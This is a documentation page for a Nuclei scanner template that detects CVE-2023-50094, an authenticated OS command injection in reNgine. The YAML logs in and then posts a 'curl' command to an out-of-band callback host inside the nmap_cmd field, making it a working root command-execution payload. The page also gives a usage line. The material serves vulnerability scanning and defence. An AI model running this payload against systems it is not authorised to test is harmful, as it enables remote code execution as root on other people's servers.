Skip to content
Nuclei Templates

reNgine 2.2.0 - Command Injection

ID: CVE-2023-50094

Severity: high

Author: Zierax

Tags: cve,cve2023,rengine,rce,injection,authenticated

Description

Section titled “Description”

reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.

YAML Source

Section titled “YAML Source”
id: CVE-2023-50094


info:
  name: reNgine 2.2.0 - Command Injection
  author: Zierax
  severity: high
  description: |
    reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
  reference:
    - https://github.com/yogeshojha/rengine
    - https://github.com/Zierax/CVE-2023-50094_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50094
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-50094
    cwe-id: CWE-78
    cpe: cpe:2.3:a:yogeshojha::*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: yogeshojha
    product: rengine
    shodan-query: title:"reNgine"
  tags: cve,cve2023,rengine,rce,injection,authenticated


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "rengine")'
        internal: true


  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username={{username}}&password={{password}}


      - |
        POST /scan-engine/update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"nmap_cmd": 'curl {{interactsh-url}}'}


    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol_2, "dns")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100fd49889ceee844270469df825dc24d149b0ad1cfcea1e5c1da8cf5c6cc451121022100a5c21df8088029d5251638baab6d55f0d7a800c75322da1f97e7a0208051f70f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50094.yaml"

View on Github